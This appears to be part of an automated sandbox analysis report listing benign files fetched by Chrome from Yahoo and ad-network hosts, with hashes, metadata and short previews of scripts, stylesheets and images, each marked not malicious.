                                                                                                                                                                                                                  Entropy (8bit):5.254821090865018
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:336B804960F2D2E05B7372CFCF7CA6F7
                                                                                                                                                                                                                  SHA1:EDDC49C133EC21645B2AE1FB0D269856A1821449
                                                                                                                                                                                                                  SHA-256:B4235ED7DE3D5310BF6EAF35A3F5672AD57453D2AADC627AE0EC66016450D5F8
                                                                                                                                                                                                                  SHA-512:7EFF7E0255E665E4766961596F1CCC27FAF04D6D18435CD44AFD8A7F1811954D9C267B9CC19CCB737639FCE28ED40E5D61F7EC264BFDCF812A003D32B79416AB
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  URL:https://assets.a-mo.net/js/cframe.js
                                                                                                                                                                                                                  Preview:(()=>{function r(r){return void 0===r?{b:0}:null!==r&&void 0!==r.b?{b:r.b+1|0}:r}function n(n){return null==n?void 0:r(n)}function e(r){if(null===r||void 0===r.b)return r;var n=r.b;return 0===n?void 0:{b:n-1|0}}function t(n,t){if(void 0!==n)return r(t(e(n)))}function i(r,n){if(void 0!==r)return n(e(r))}function a(r,n){return void 0!==r?e(r):n}function o(r,n){return void 0!==r?r:n}function u(r){return void 0!==r}var v=new Map;function d(r){var n,e=v.get(r);if(void 0!==e){var t=e+1|0;v.set(r,t),n=t}else v.set(r,1),n=1;return r+"/"+n}function c(r,n){return r.catch((r=>{return n((r=>null!=r&&"string"==typeof r.a)(e=r)?e:{a:"0j",o:e});var e}))}function f(r){return Promise.resolve(r)}function s(r,n){return r.then((r=>Promise.resolve(n(r))))}function m(r){return r.then((r=>Promise.resolve()))}var l=window,p=document;function w(r){return c(m(r),(r=>(((r,n)=>{var e=l.parent;null==e||e.postMessage({u:"/a/e",e:n+""},"*")})(0,r),Promise.resolve())))}function g(n){if(""!==n)try{return r(new URL(n))
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                  Size (bytes):22971
                                                                                                                                                                                                                  Entropy (8bit):5.375987138394773
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:93423A7A3636346CEA38F6BBC2CC3906
                                                                                                                                                                                                                  SHA1:C0A0804BDB49DF109FE3A41E3C05CDCB3AEDAC8A
                                                                                                                                                                                                                  SHA-256:80FE8A0B2F97A31016E7927A7A83B6AEA69E263B58F1596C1DA2198EC87284B6
                                                                                                                                                                                                                  SHA-512:638C7988DF0A1B2CD8BA2E30A5DD366EAE09DF1FC728E824FE6DA51BEBC6DE21F3E29E1A13FD4587962E82066A3ECA2BF6F67AC28EA3BAAA4D163F599421BE1E
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  URL:https://www.yahoo.com/service-worker.js
                                                                                                                                                                                                                  Preview:/* version: 1.1.53 */.!function(){"use strict";function e(e,t,n,r,i,a,o){try{var c=e[a](o),s=c.value}catch(e){return void n(e)}c.done?t(s):Promise.resolve(s).then(r,i)}function t(t){return function(){var n=this,r=arguments;return new Promise((function(i,a){var o=t.apply(n,r);function c(t){e(o,i,a,c,s,"next",t)}function s(t){e(o,i,a,c,s,"throw",t)}c(void 0)}))}}function n(e,t,n){return(t=function(e){var t=function(e,t){if("object"!=typeof e||!e)return e;var n=e[Symbol.toPrimitive];if(void 0!==n){var r=n.call(e,t||"default");if("object"!=typeof r)return r;throw new TypeError("@@toPrimitive must return a primitive value.")}return("string"===t?String:Number)(e)}(e,"string");return"symbol"==typeof t?t:t+""}(t))in e?Object.defineProperty(e,t,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[t]=n,e}function r(e,t){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var r=Object.getOwnPropertySymbols(e);t&&(r=r.filter((function(t){return Object.getOwnPropertyDescriptor(e,t).enumerable})
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                  Size (bytes):1301
                                                                                                                                                                                                                  Entropy (8bit):4.774650005361297
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:82DD83A98D216BA3F8537D67723FF769
                                                                                                                                                                                                                  SHA1:CA0414AF1F7E4B66903862FCB4136624A1CC75CD
                                                                                                                                                                                                                  SHA-256:8C89F1B9F6E7ABDD0254236F65EFA6F5B49328C12F25151747B8CE4BB49538AD
                                                                                                                                                                                                                  SHA-512:ED78FD4DA1D14BFC0B090135C7E04AC951AAA640E01B54919AB053F5E434ACF912F6CE215000F26F54E614F2C73C8310BE76D9B4454DFD5CD3A56D4B22DD6B7C
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  URL:https://cdn.taboola.com/static/6b/6b91a1bc-8217-4d34-9774-28dc8fd0cd05.css
                                                                                                                                                                                                                  Preview:@font-face {. font-family: 'Helvetica Neue';. src: url('//cdn.taboola.com/static/impl/eot/HelveticaNeue-Roman.eot');. src: local('Helvetica 55 Roman'), local('HelveticaNeue-Roman'),. url('//cdn.taboola.com/static/impl/eot/HelveticaNeue-Roman.eot?#iefix') format('embedded-opentype'),. url('//cdn.taboola.com/static/impl/woff2/HelveticaNeue-Roman.woff2') format('woff2'),. url('//cdn.taboola.com/static/impl/woff/HelveticaNeue-Roman.woff') format('woff'),. url('//cdn.taboola.com/static/impl/ttf/HelveticaNeue-Roman.ttf') format('truetype');. font-weight: normal;. font-style: normal;. font-display: swap;.}..@font-face {. font-family: 'Helvetica Neue';. src: url('//cdn.taboola.com/static/impl/eot/HelveticaNeue-Bold.eot');. src: local('Helvetica Neue Bold'), local('HelveticaNeue-Bold'),. url('//cdn.taboola.com/static/impl/eot/HelveticaNeue-Bold.eot?#iefix') format('embedded-opentype'),. url('//cdn.taboola.com/static/impl/woff2
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1527
                                                                                                                                                                                                                  Entropy (8bit):5.248147271838624
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:D5A93703475E2C0BE639363E62B8563A
                                                                                                                                                                                                                  SHA1:D23E4866B7D386C5934E0CE201F942E03E52CC3A
                                                                                                                                                                                                                  SHA-256:1819488198294842AF973D8D3DE0B96858F8D48D0DC4F472689399534A01EF78
                                                                                                                                                                                                                  SHA-512:AFB17F84D3FA64138F5BB793601E2A18B6BC40FE069B919A860B40D7E4E55D4D62737843A69383DFB148AAE28C7B18AFF3DD434979A8B480B8FB5D39A1E95779
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  Preview:{"assets":{"css":[{"location":"top","value":"/aaq/cprops/colors_1.1.27.min.css","name":"custom-properties","version":"1.1.27"},{"location":"top","value":"/aaq/fp/css/react-wafer-shopping.Shopping.atomic.ltr.d156b541c028fe7d3167b101d15500f6.min.css","name":"react-wafer-shopping.Shopping.atomic"}],"js":[{"location":"bottom","value":"/aaq/wf/wf-core-1.65.1-modern.js","name":"wafer-core","version":"1.65.1"},{"location":"bottom","value":"/aaq/wf/wf-fetch-1.19.1-modern.js","name":"wafer-fetch","version":"1.19.1"}]},"data":{},"html":"<div class=\"wafer-fetch Pos(r)\" id=\"commerce-module-container\" data-wf-body=\"{&quot;config.cpos&quot;:18,&quot;config.enableUserIntent&quot;:false,&quot;config.hiddenCount&quot;:2,&quot;config.listId&quot;:&quot;142c3121-f125-4773-aaf3-3bc2a9c826f1&quot;,&quot;config.openLinksInNewTab&quot;:false,&quot;config.pageContext&quot;:&quot;&quot;,&quot;config.productListId&quot;:&quot;6be44312-a3bc-4c63-891c-d06e455285fc&quot;,&quot;config.renderShoppingProducts&qu
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                  Size (bytes):5244
                                                                                                                                                                                                                  Entropy (8bit):7.772262856671828
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:5EB076D0D080E4D2A9D3803BC418FF88
                                                                                                                                                                                                                  SHA1:380EB762C2733EDFEEF819B8402C4BC344FE2BD3
                                                                                                                                                                                                                  SHA-256:851D0438515DE78D8F6990130253B3967148442170520F192C75F8666C71E0B0
                                                                                                                                                                                                                  SHA-512:D4B91A05A8C531F2F26CFF890DE207BA626EBD7A24B0A3C2FD201352EA404975FFD1BA9F7B627A4D697F3B0A9085741C2BA6A59E149710A8BA50294AB211A9F5
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  URL:https://s.yimg.com/uu/api/res/1.2/mbAq4p_xEdKUeYiZOXrw0Q--~B/Zmk9c3RyaW07aD0xODA7cT04MDt3PTM1NjthcHBpZD15dGFjaHlvbg--/https://s.yimg.com/os/creatr-uploaded-images/2024-10/0e963380-81d0-11ef-b8f2-d9736f3ba83a.cf.webp
                                                                                                                                                                                                                  Preview:RIFFt...WEBPVP8X.... ...c.....ICCP0......0ADBE....mntrRGB XYZ .........3.;acspAPPL....none...........................-ADBE................................................cprt.......2desc...0...kwtpt........bkpt........rTRC........gTRC........bTRC........rXYZ........gXYZ........bXYZ........text....Copyright 2000 Adobe Systems Incorporated...desc........Adobe RGB (1998)................................................................................XYZ .......Q........XYZ ................curv.........3..curv.........3..curv.........3..XYZ ..........O.....XYZ ......4....,....XYZ ......&1.../....VP8 .....o...*d...>y8.H$.*)......M..t....}........g..j^ju..Dy...........7.g......}~...:...<.?...|3..zR..`..J..1.M(.5H...\..;..'....{D...8k....4K(......n....nB..^... ........ ...X+N.'...6v...0..~.Q|.Y.:Q.S)Mn... ."g%rU....^r.-p.?.Y.]n...L..Be..I~(.w}.U.Z/.....%Q.S.8...y.w.<.I.f.r0)..f.`&,.....,.z0n...6....9(....o.)5~...:..0.Bg.{...^....D.........2.[..2{P.XM...?.......N@.`.._|.\.M..
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):88422
                                                                                                                                                                                                                  Entropy (8bit):5.376367524308575
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:BDC382BD36F77C5B67775B9082F6714B
                                                                                                                                                                                                                  SHA1:7142B87042AE1C5426AAB47F9AAE412C12DFF273
                                                                                                                                                                                                                  SHA-256:9A6C81A888A2F0DBA81A5BF75788D3671E111E200E8EF1FCA29802879D04392E
                                                                                                                                                                                                                  SHA-512:9BE57761555E2E8010C64BD99E39170CBF7EAED81E3DBD195033D38FD1D97BB83D0FBA7190D91AACEF5E7A0722C5A906F1E048735A51F097FE91C87D1B5D160B
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  Preview:!function(){"use strict";const e="undefined"!=typeof window?window:{assertive:{},benji:{},googletag:{cmd:[]},pbjs:{que:[]},YAHOO:{}};Promise.allSettled=Promise.allSettled||(e=>Promise.all(e.map((e=>e.then((e=>({status:"fulfilled",value:e}))).catch((e=>({reason:e,status:"rejected"})))))));const t=["localhost","aol.com","aol.co.uk","aol.de","autoblog.com","cricket.yahoo.sportz.io","engadget.com","yahoo.com","yahoo.com.hk","yahoo.com.tw"].map((e=>`([\\.\\w\\-]+\\.)?${e.replace(/\./g,"\\.")}`)),n=["cricket.yahoo.net"].map((e=>e.replace(/\./g,"\\."))),i=new RegExp(`^https?://(${t.concat(n).join("|")})(:\\d+)?$`);const s="initialize",o="initialize_ack",r="initialize_i13n",a="intersect",c="render",d="resize_ad",l="start_ads",h="tab_focus",u="block",g="index",p=!0,f="DOMContentLoaded",m="0",b="testid",y="ncid",_="fr",E="pg_name",v="type",I="benji-premium-ad",S="auto",A="VERSION",C={ATS_DIRECT:"_lr_atsDirect"};var T,w;!function(e){e.DynamicAllocation="Dynamic Allocation",e.DirectSold="Direct So
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                  Size (bytes):31200
                                                                                                                                                                                                                  Entropy (8bit):7.981740966359038
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:C744C2A698B78FA79FD93B2ED1349420
                                                                                                                                                                                                                  SHA1:6A89554E5C2B5D155704724566665998A1590900
                                                                                                                                                                                                                  SHA-256:451BC57BCC2E6FE66B05A366A7F54333239F4B5BD4F27A9BE42B723D447F01B2
                                                                                                                                                                                                                  SHA-512:0FA018A9C36323B858316306A88F6A89AFB39E05A52862D150BBDCAA5F972F2B8444E000FFE2F393D48A9BBDA6FDFC4B4858E12C017E43A1886140669AF22E02
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  URL:https://s.yimg.com/uu/api/res/1.2/mRGRBX4XSPBchHJNCagsKg--~B/Zmk9c3RyaW07aD0yNzI7cT05NTt3PTU2MDthcHBpZD15dGFjaHlvbg--/https://s.yimg.com/os/creatr-uploaded-images/2024-10/86300b50-8243-11ef-bafa-aeb7e0276947.cf.webp
                                                                                                                                                                                                                  Preview:RIFF.y..WEBPVP8X.... .../.....ICCP$......$appl....mntrRGB XYZ ...........9acspAPPL....APPL...........................-appl...g.F.K.Dn..u.................................desc.......ecprt...d...#wtpt........rXYZ........gXYZ........bXYZ........rTRC....... chad.......,bTRC....... gTRC....... desc........Display P3..................................................................................text....Copyright Apple Inc., 2015..XYZ .......Q........XYZ ..........=.....XYZ ......J....7....XYZ ......(8.......para..........ff......P........sf32.......B.......&.......................nVP8 .w.......*0...>...A.....q,.>Kp...............?.>A.G..../...............{.;......?.....*...u...Q...._.O.......~B...f...S.3......>.....?....{X...U..o..!....._3.6...C.C.}..;.._......W..Hu2...g...?..o.G...=n{..9...........C...?.#.o..........u.'....................w......j......n=...PJ........=0..a!.m$m...v.X[........g.....7..R...\.....W.D....jV7.4k...K.3..9..p).+@.2d.%.h.eX.5c..........)..
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (11901), with no line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):11901
                                                                                                                                                                                                                  Entropy (8bit):5.106396238513521
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:59AE89307F6BE51355E07ACF3994F79B
                                                                                                                                                                                                                  SHA1:A9C5474C652DBC6B60B97C6E723E03A399ACA92D
                                                                                                                                                                                                                  SHA-256:F54AFF9F498AEFB3479AF7D4F67B5ECE9465B24DB28293A1EE7F32A2230E162F
                                                                                                                                                                                                                  SHA-512:ED56A2963D8ACCC7E316F10138566AA2BA715384418B106997C6525D016BE61C6B7583227DBDFC28704A71248DC8E21CC0E19E8D77D46FF84A3D143FE471FD63
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  Preview:!function(a,e){"object"==typeof exports&&"object"==typeof module?module.exports=e():"function"==typeof define&&define.amd?define("wafer-loader",[],e):"object"==typeof exports?exports["wafer-loader"]=e():(a.wafer=a.wafer||{},a.wafer.wafers=a.wafer.wafers||{},a.wafer.wafers["wafer-loader"]=e())}("undefined"!=typeof self?self:this,function(){return function(a){function e(w){if(r[w])return r[w].exports;var f=r[w]={i:w,l:!1,exports:{}};return a[w].call(f.exports,f,f.exports,e),f.l=!0,f.exports}var r={};return e.m=a,e.c=r,e.d=function(a,r,w){e.o(a,r)||Object.defineProperty(a,r,{configurable:!1,enumerable:!0,get:w})},e.n=function(a){var r=a&&a.__esModule?function(){return a.default}:function(){return a};return e.d(r,"a",r),r},e.o=function(a,e){return Object.prototype.hasOwnProperty.call(a,e)},e.p="https://s.yimg.com/aaq/wf/",e(e.s="./src/entry.js")}({"../../manifest.json":function(a,e){a.exports={"wafer-account-switch":{meta:{version:"1.1.7"},modern:{min:"/aaq/wf/wf-account-switch-1.1.7-moder
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:PNG image data, 240 x 72, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                  Size (bytes):1391
                                                                                                                                                                                                                  Entropy (8bit):7.763598788410441
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:DD31F56B9E4DFF40EB87447C3DC55B84
                                                                                                                                                                                                                  SHA1:1908B34AF2D15440D33DFC81FCB93AA9B271DC58
                                                                                                                                                                                                                  SHA-256:4F47EF8FF3DAD2A78360AB207CF35FF2905622511C0426109F6E225052CF5637
                                                                                                                                                                                                                  SHA-512:057D2DCD66C48A2BB43D7B62BC38E4DACD3D7F3FDAA103AF178FDBC737BE91A81A369158BF02AB59C46F507F538536D01D5FC179D681375F9B77EE814E544407
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  URL:https://s.yimg.com/rz/p/yahoo_frontpage_en-US_s_f_w_bestfit_frontpage_2x.png
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......H............3PLTEGpL..................................................a....tRNS......=..T.*v.h.#......IDATx^... ..9J...?m.....eL.ig..w.8.O.I.U.....(.S....R..I8N...\...=...yw`..I...(p...P...k.....<d...)oP{..;p..N...C...X).....,.v.N..>..9..0.,....>.....w1K........0......}.B.....&.J.......t..Q.....mn...,....=. ..<.)4.1..(.(H...O.....[.u^~c;.*L...8."....k.q...6d....X.....wFs.,y!..b....j.........,.'F..C....CP2.'.$.M..A.].>.`m9.`...H<..Va.%SD6.*0......a...W..p".q.P..a..yik...f..e..fe.<>.s..S... *.%...N....<zaX...4..A..\lV.K......<'.G.D.duq..i........{.......M..f.3......?...4..d!..k.........C$...b.Y.RwC.Q.a....'..p.k..@x..{`o.r..7..K.-..D.k.J.....R"..0E).p../..0X...N....J.2.....n..j~v..HuA.sK._..feg....Ib...0....\...U....0k.J.....'....s.+5.k1...!.x^wl..&....P.6...\~....E...^..'wm...#U..p{.l.~.....i.......t..?..q..<%...d....WN\."[........5...Y....[.QH..$.k>....."........t#..W........&..</.y...+ .w.X...!...}..G.......q...E$..:..v..
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                                                  Entropy (8bit):5.081727678869736
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:FC1F8B0F771420803F2B523851FB70FB
                                                                                                                                                                                                                  SHA1:05592E95D28FB6E6C5DD6BD46EEC5DBD91193F5A
                                                                                                                                                                                                                  SHA-256:E074B77FECD5E56996231D139C14FE0ED4333D702ABC26611F1A3E2ED2BF3B08
                                                                                                                                                                                                                  SHA-512:C372A729BD57E2898062EE4DEC590F2A3FCB8F0617C6975A62EA45908CF117290E5E72F6C72DDB804DCEF6B76738ED3475EE05846D35D36A4F3717CFCFAD7A32
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  Preview:{"axid": "eS1HOE1rQmVGRTJ1Rm9nZ2xUMGNONHpVRi5sTE1kT3hvMn5B"}
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                  Size (bytes):175
                                                                                                                                                                                                                  Entropy (8bit):4.660001480021975
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:CDD5050BA6288DF47182412E30E482A4
                                                                                                                                                                                                                  SHA1:19D881F9D478DE895E602D6A908D9A3621160ECC
                                                                                                                                                                                                                  SHA-256:0C4BAFD7F8E2A0C485CB3715F666EE47980FE1E22A7FDCCC84D213A13C058E26
                                                                                                                                                                                                                  SHA-512:86AA7CCE16D0DC82BF7155D0C11911058E78F77D640F183E681220E71AEF7314D3AE7DAA78AC4728E37E3E011AA5010A9AAA3266A4D85FCDE3D88FC872B41C66
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  URL:https://s.yimg.com/aaq/fp/css/react-wafer-games.games-mini.cdd5050ba6288df47182412e30e482a4.css
                                                                                                                                                                                                                  Preview:.games-tabs-scrollview .prev-btn[disabled]{display:none}#atomic .games-tabs>button:last-child{margin-right:10px}.games-tabs-scrollview .slides::-webkit-scrollbar{display:none}
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                  Size (bytes):12310
                                                                                                                                                                                                                  Entropy (8bit):7.9252332595156245
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:51E13F08BF324E1B1671E24F02F1597C
                                                                                                                                                                                                                  SHA1:C103DEC3C9F433788EC490BC5C723D95329421B5
                                                                                                                                                                                                                  SHA-256:451980EE75B02F3C8E432BAE4F028A3ACEF6E185DD9DB4A9553B010096F090A8
                                                                                                                                                                                                                  SHA-512:E1AC43A041DDA45BB45FD5B0D49CDB96B65BB7C3272BE1A561D6753C27E38A128AE45F3ED1FC1C657501C5BB60C0D6076BEAC66D1C173457AC2C938FC7C348BB
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  URL:https://s.yimg.com/uu/api/res/1.2/WNenG6y7I38KfFkErLQ72A--~B/Zmk9c3RyaW07aD0xNTY7dz0zMDA7YXBwaWQ9eXRhY2h5b24-/https://s.yimg.com/os/creatr-uploaded-images/2024-09/41711720-81bc-11ef-beaf-fa1759ae2bd1.cf.webp
                                                                                                                                                                                                                  Preview:RIFF.0..WEBPVP8X.... ...+.....ICCP0......0ADBE....mntrRGB XYZ ............acspAPPL....none...........................-ADBE................................................cprt.......2desc...0...kwtpt........bkpt........rTRC........gTRC........bTRC........rXYZ........gXYZ........bXYZ........text....Copyright 1999 Adobe Systems Incorporated...desc........Adobe RGB (1998)................................................................................XYZ .......Q........XYZ ................curv.........3..curv.........3..curv.........3..XYZ ..........O.....XYZ ......4....,....XYZ ......&1.../....VP8 .-..P....*,...>y0.F$.!...0...hm.....N... ^..?............._.}....c...._...O.=.<......K.....C...............z...zs...4.u.............?..y.c.Q...../.......w....._..K.w..zgC>o.............O.`............^._...z..}.....?.}.?`.8...............}p9.9.S.....Q.,.......rW6...H.J...?.R..A....R(..]..eAD.<..Nw....l./......_Jrg...jd..c@.VoY.)...5..Gi..b.$.E......0....K.M3............'...r-G.
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                  Size (bytes):237
                                                                                                                                                                                                                  Entropy (8bit):4.578085753393818
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:FDF1FC8FE6BC6D08523F7958B8EDF2B5
                                                                                                                                                                                                                  SHA1:64BFDD0AF4AC4C7B85D70D469D6BA14D931E15F9
                                                                                                                                                                                                                  SHA-256:1BA4AEFDEE0BB016C7BD948333B442DE969C615B101F54686DE08ADAD125F4FF
                                                                                                                                                                                                                  SHA-512:F630F5614C5E7F47C020D5E24F0883E4C89CFF47ADB7BD67D8378F36A7B75075FB08358D9D97CF1936FAE293C3F07B2B315D72801A2687DF48A888EC857EF138
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  URL:https://s.yimg.com/aaq/fp/css/react-wafer-shopping.custom.desktop.fdf1fc8fe6bc6d08523f7958b8edf2b5.css
                                                                                                                                                                                                                  Preview:.shopping-product:hover .shopping-caption-container{width:155px!important}.shopping-product:hover .shopping-caption{opacity:1!important}@media (max-width:1190px){.shopping-product:hover .shopping-caption-container{width:125px!important}}
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:HTML document, ASCII text, with very long lines (820)
                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                  Size (bytes):1019
                                                                                                                                                                                                                  Entropy (8bit):5.5805937618497365
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:099D55C40BB3EA8EA528640FFFE77927
                                                                                                                                                                                                                  SHA1:5C903728C38AA89AEBC390BFA8465D5B7153FDD4
                                                                                                                                                                                                                  SHA-256:2230EAFA1C97E95BD2EEE15C577F62B4C6F729E64B00DB40ED6BEEE64E4B9465
                                                                                                                                                                                                                  SHA-512:6C6F3410A9C0898504F013E35CCAD14D1C2A5DB26FF10197AFB6FAEE7CEA19AAABBF0C41C38535C238CCB97942565555F0E3D81DDF29C411ABE8190FA09EF64F
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  URL:https://u.openx.net/w/1.0/cm?cc=1&id=891039ac-a916-42bb-a651-4be9e3b201da&ph=a3aece0c-9e80-4316-8deb-faf804779bd1&gdpr=0&gdpr_consent=&r=https%3A%2F%2Fpbs.yahoo.com%2Fsetuid%3Fbidder%3Dopenx%26gdpr%3D0%26gdpr_consent%3D%26gpp%3DDBAA%26gpp_sid%3D-1%26f%3Di%26uid%3D%7BOPENX_ID%7D
                                                                                                                                                                                                                  Preview:<html>.<head><title>Pixels</title></head>.<body>.<script>if("browsingTopics"in document&&document.featurePolicy.allowsFeature("browsing-topics"))document.browsingTopics()</script>..<img src="https://pbs.yahoo.com/setuid?bidder=openx&gdpr=0&gdpr_consent=&gpp=DBAA&gpp_sid=-1&f=i&uid=8c190a56-71fe-011a-2c6e-5c0ff7772231"><img src="https://sync-tm.everesttech.net/upi/pid/ny75r2x0?redir=https%3A%2F%2Fus-u.openx.net%2Fw%2F1.0%2Fsd%3Fid%3D537148856%26val%3D%24%7BTM_USER_ID%7D"><img src="https://pr-bh.ybp.yahoo.com/sync/openx/2100e3dd-58cd-a0ba-7635-8aef897b2df5?gdpr=0"><img src="https://s.amazon-adsystem.com/dcm?pid=6e1b1225-4dd8-4d7d-b277-465574a27014&id=ed11f9e4-d4cb-8909-87ec-1e8d1e1f2b5c"><img src="https://match.adsrvr.org/track/cmf/openx?oxid=b5c78599-c861-32f3-47e2-9c1a762ce0bc&gdpr=0"><img src="https://cm.g.doubleclick.net/pixel?google_nid=openx&google_hm=OTlhODU2NTMtMDExNi02YzU3LTUyMDItYzZhM2JjY2UyZWRj"><img src="https://cm.g.doubleclick.net/pixel?google_nid=openx&google_cm&google_sc"
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 300x156, components 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):25827
                                                                                                                                                                                                                  Entropy (8bit):7.947423429384203
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:D06400B55A55BA6327DDE88BF68CF9EB
                                                                                                                                                                                                                  SHA1:16CFA071184FBB3BC11F442FCF5A06D49F128058
                                                                                                                                                                                                                  SHA-256:6A786242DD7D2DE5DF84F0968001FCE5D710020003C3BC25B113A2B9A88E85C4
                                                                                                                                                                                                                  SHA-512:51A4BFFE44F523C1271CF6CE67ADE86A8C2C2DD0634DF04F5941FCE2B45D261E2E85E3353A0D8E7663467C581D40DCAE933DEB7169D3AD7D1B74D42AB800654A
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
